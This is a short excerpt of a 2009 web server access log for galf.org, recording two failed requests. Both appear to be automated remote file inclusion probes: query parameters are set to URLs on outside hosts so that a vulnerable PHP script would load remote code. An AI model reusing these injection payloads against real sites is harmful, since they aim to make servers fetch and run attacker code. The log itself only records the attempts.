203.185.129.36 - - [27/Sep/2009:22:05:41 -0700] "GET /logs/access_090223.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:22:08:14 -0700] "GET /logs/access_090608.log//common/db.php?commonpath=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
